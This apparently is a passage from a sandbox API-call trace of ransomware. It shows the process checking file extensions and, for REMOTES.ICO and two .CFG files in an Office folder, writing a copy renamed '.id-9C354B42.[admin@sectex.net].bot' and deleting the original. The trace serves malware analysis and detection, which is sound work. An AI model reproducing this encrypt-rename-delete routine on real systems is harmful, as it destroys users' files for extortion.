	[0162.676] lstrlenW (lpString=".1cd") returned 4
	[0162.676] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO") returned 65
	[0162.676] lstrlenW (lpString=".jpg") returned 4
	[0162.676] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.676] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0162.676] lstrlenW (lpString="REMOTES.ICO") returned 11
	[0162.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.677] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2998) returned 1
	[0162.677] CloseHandle (hObject=0x3f0) returned 1
	[0162.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico")) returned 0x20
	[0162.678] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.678] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.678] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.679] GetLastError () returned 0x0
	[0162.679] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0162.681] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0162.682] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.682] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0162.682] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.682] CloseHandle (hObject=0x3c4) returned 1
	[0162.682] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.682] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.684] CloseHandle (hObject=0x3f0) returned 1
	[0162.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.685] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico")) returned 1
	[0162.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.685] lstrlenW (lpString=".doc") returned 4
	[0162.685] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.685] lstrlenW (lpString=".docx") returned 5
	[0162.685] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0162.685] lstrlenW (lpString=".pdf") returned 4
	[0162.685] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.686] lstrlenW (lpString=".xls") returned 4
	[0162.686] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.686] lstrlenW (lpString=".xlsx") returned 5
	[0162.686] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0162.686] lstrlenW (lpString=".ppt") returned 4
	[0162.686] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.686] lstrlenW (lpString=".zip") returned 4
	[0162.686] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.686] lstrlenW (lpString=".rar") returned 4
	[0162.686] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.686] lstrlenW (lpString=".bz2") returned 4
	[0162.686] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.686] lstrlenW (lpString=".7z") returned 3
	[0162.686] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.686] lstrlenW (lpString=".dbf") returned 4
	[0162.686] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.686] lstrlenW (lpString=".1cd") returned 4
	[0162.686] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.686] lstrlenW (lpString=".jpg") returned 4
	[0162.686] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.686] lstrlenW (lpString=".doc") returned 4
	[0162.686] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.686] lstrlenW (lpString=".docx") returned 5
	[0162.686] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0162.686] lstrlenW (lpString=".pdf") returned 4
	[0162.687] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.687] lstrlenW (lpString=".xls") returned 4
	[0162.687] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.687] lstrlenW (lpString=".xlsx") returned 5
	[0162.687] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0162.687] lstrlenW (lpString=".ppt") returned 4
	[0162.687] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.687] lstrlenW (lpString=".zip") returned 4
	[0162.687] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.687] lstrlenW (lpString=".rar") returned 4
	[0162.687] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.687] lstrlenW (lpString=".bz2") returned 4
	[0162.687] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.687] lstrlenW (lpString=".7z") returned 3
	[0162.687] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.687] lstrlenW (lpString=".dbf") returned 4
	[0162.687] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.687] lstrlenW (lpString=".1cd") returned 4
	[0162.687] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO") returned 65
	[0162.687] lstrlenW (lpString=".jpg") returned 4
	[0162.687] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.687] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0162.687] lstrlenW (lpString="REPLTMPL.CFG") returned 12
	[0162.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.688] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=826) returned 1
	[0162.688] CloseHandle (hObject=0x3f0) returned 1
	[0162.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg")) returned 0x20
	[0162.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.689] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.689] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.689] GetLastError () returned 0x0
	[0162.689] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x33a, lpOverlapped=0x0) returned 1
	[0162.842] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x340, lpOverlapped=0x0) returned 1
	[0162.844] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.844] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.844] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.844] CloseHandle (hObject=0x3c4) returned 1
	[0162.844] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.844] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.846] CloseHandle (hObject=0x3f0) returned 1
	[0162.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg")) returned 1
	[0162.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.847] lstrlenW (lpString=".doc") returned 4
	[0162.847] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString=".docx") returned 5
	[0162.848] lstrcmpiW (lpString1=".docx", lpString2="L.CFG") returned -1
	[0162.848] lstrlenW (lpString=".pdf") returned 4
	[0162.848] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString=".xls") returned 4
	[0162.848] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString=".xlsx") returned 5
	[0162.848] lstrcmpiW (lpString1=".xlsx", lpString2="L.CFG") returned -1
	[0162.848] lstrlenW (lpString=".ppt") returned 4
	[0162.848] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.848] lstrlenW (lpString=".zip") returned 4
	[0162.848] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString=".rar") returned 4
	[0162.848] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString=".bz2") returned 4
	[0162.848] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0162.848] lstrlenW (lpString=".7z") returned 3
	[0162.848] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0162.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.848] lstrlenW (lpString=".dbf") returned 4
	[0162.848] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.848] lstrlenW (lpString=".1cd") returned 4
	[0162.848] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0162.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.848] lstrlenW (lpString=".jpg") returned 4
	[0162.848] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.848] lstrlenW (lpString=".doc") returned 4
	[0162.848] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0162.848] lstrlenW (lpString=".docx") returned 5
	[0162.849] lstrcmpiW (lpString1=".docx", lpString2="L.CFG") returned -1
	[0162.849] lstrlenW (lpString=".pdf") returned 4
	[0162.849] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0162.849] lstrlenW (lpString=".xls") returned 4
	[0162.849] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0162.849] lstrlenW (lpString=".xlsx") returned 5
	[0162.849] lstrcmpiW (lpString1=".xlsx", lpString2="L.CFG") returned -1
	[0162.849] lstrlenW (lpString=".ppt") returned 4
	[0162.849] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0162.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.849] lstrlenW (lpString=".zip") returned 4
	[0162.849] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0162.849] lstrlenW (lpString=".rar") returned 4
	[0162.849] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0162.849] lstrlenW (lpString=".bz2") returned 4
	[0162.849] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0162.849] lstrlenW (lpString=".7z") returned 3
	[0162.849] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0162.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.849] lstrlenW (lpString=".dbf") returned 4
	[0162.849] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0162.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.849] lstrlenW (lpString=".1cd") returned 4
	[0162.849] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0162.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG") returned 66
	[0162.849] lstrlenW (lpString=".jpg") returned 4
	[0162.849] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0162.849] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0162.849] lstrlenW (lpString="RESEND.CFG") returned 10
	[0162.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.850] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=779) returned 1
	[0162.851] CloseHandle (hObject=0x3f0) returned 1
	[0162.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg")) returned 0x20
	[0162.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.851] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.851] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.852] GetLastError () returned 0x0
	[0162.852] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x30b, lpOverlapped=0x0) returned 1
	[0162.854] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x310, lpOverlapped=0x0) returned 1
	[0162.855] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.855] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0162.855] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.855] CloseHandle (hObject=0x3c4) returned 1
	[0162.855] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.855] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.857] CloseHandle (hObject=0x3f0) returned 1
	[0162.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.858] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg")) returned 1
	[0162.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.858] lstrlenW (lpString=".doc") returned 4
	[0162.858] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0162.858] lstrlenW (lpString=".docx") returned 5
	[0162.859] lstrcmpiW (lpString1=".docx", lpString2="D.CFG") returned -1
	[0162.859] lstrlenW (lpString=".pdf") returned 4
	[0162.859] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0162.859] lstrlenW (lpString=".xls") returned 4
	[0162.859] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0162.859] lstrlenW (lpString=".xlsx") returned 5
	[0162.859] lstrcmpiW (lpString1=".xlsx", lpString2="D.CFG") returned -1
	[0162.859] lstrlenW (lpString=".ppt") returned 4
	[0162.859] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0162.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.859] lstrlenW (lpString=".zip") returned 4
	[0162.859] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0162.859] lstrlenW (lpString=".rar") returned 4
	[0162.859] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0162.859] lstrlenW (lpString=".bz2") returned 4
	[0162.859] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0162.859] lstrlenW (lpString=".7z") returned 3
	[0162.859] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0162.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.859] lstrlenW (lpString=".dbf") returned 4
	[0162.859] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0162.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.859] lstrlenW (lpString=".1cd") returned 4
	[0162.859] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0162.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.859] lstrlenW (lpString=".jpg") returned 4
	[0162.859] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0162.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.859] lstrlenW (lpString=".doc") returned 4
	[0162.859] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0162.859] lstrlenW (lpString=".docx") returned 5
	[0162.859] lstrcmpiW (lpString1=".docx", lpString2="D.CFG") returned -1
	[0162.859] lstrlenW (lpString=".pdf") returned 4
	[0162.860] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0162.860] lstrlenW (lpString=".xls") returned 4
	[0162.860] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0162.860] lstrlenW (lpString=".xlsx") returned 5
	[0162.860] lstrcmpiW (lpString1=".xlsx", lpString2="D.CFG") returned -1
	[0162.860] lstrlenW (lpString=".ppt") returned 4
	[0162.860] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0162.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.860] lstrlenW (lpString=".zip") returned 4
	[0162.860] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0162.860] lstrlenW (lpString=".rar") returned 4
	[0162.860] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0162.860] lstrlenW (lpString=".bz2") returned 4
	[0162.860] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0162.860] lstrlenW (lpString=".7z") returned 3
	[0162.860] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0162.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.860] lstrlenW (lpString=".dbf") returned 4
	[0162.860] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0162.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
	[0162.860] lstrlenW (lpString=".1cd") returned 4
	[0162.860] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0162.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG") returned 64
